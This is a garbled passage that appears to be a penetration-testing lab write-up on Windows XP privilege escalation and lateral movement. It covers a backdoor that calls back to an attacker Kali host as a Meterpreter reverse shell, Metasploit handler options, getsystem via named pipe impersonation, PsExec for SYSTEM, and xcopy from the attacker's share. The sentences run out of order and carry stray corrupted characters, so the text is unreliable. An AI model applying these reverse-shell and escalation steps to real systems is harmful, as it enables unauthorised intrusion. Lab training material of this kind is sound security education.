This of course could be a reverse shell back to the Kali machine, effectively giving us a SYSTEM shell. To do this we use PsExec.exe, which when executed by a user in the Administrators group will run any given exe with SYSTEM privileges. Next let’s escalate privileges to SYSTEM. Our user is in the Administrators localgroup Alias name administratorsĬomment Administrators have complete and unrestricted access to the computer/domain System Up Time: 1 Days, 4 Hours, 4 Minutes, 34 Seconds OS Name: Microsoft Windows XP Professional We’re on a 32-bit Win XP machine Host Name: ELS-WINXP From this we can extract some useful info. The script terminated halfway, and partial results are here. After that I ran Powerless.bat to enumerate. Ok, so we’re in, dropped a shell, copied over whoami.exe to check who we are. got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).įOR /F "tokens=*" %%A IN ('netstat -an ^| find "172.16.5.40" ^| find "ESTABLISHED"') DO set /a Variable=1Ĭ:\Lab5>xcopy \\172.16.5.40\Lab5 C:\Lab5 /e
LHOST 172.16.5.40 yes The listen address (an interface may be specified) Payload options (windows/meterpreter/reverse_tcp):ĮXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) Name Current Setting Required Description But after that can drop shell and avoid msf completely. Keeping with recent trends I have tried to avoid Metasploit and/or Meterpreter where possible but unfortunately the backdoor attempts a staged reverse shell with Meterpreter payload so we have to use windows/meterpreter/reverse_tcp to catch it. Our target scope isīut we already have a backdoor installed on 10.32.120.15 which repeatedly attempts a reverse shell to our IP at 172.16.5.40. Here we’ll cover another way to escalate privileges using PsExec, pillaging and some lateral movement.
0 kommentar(er)
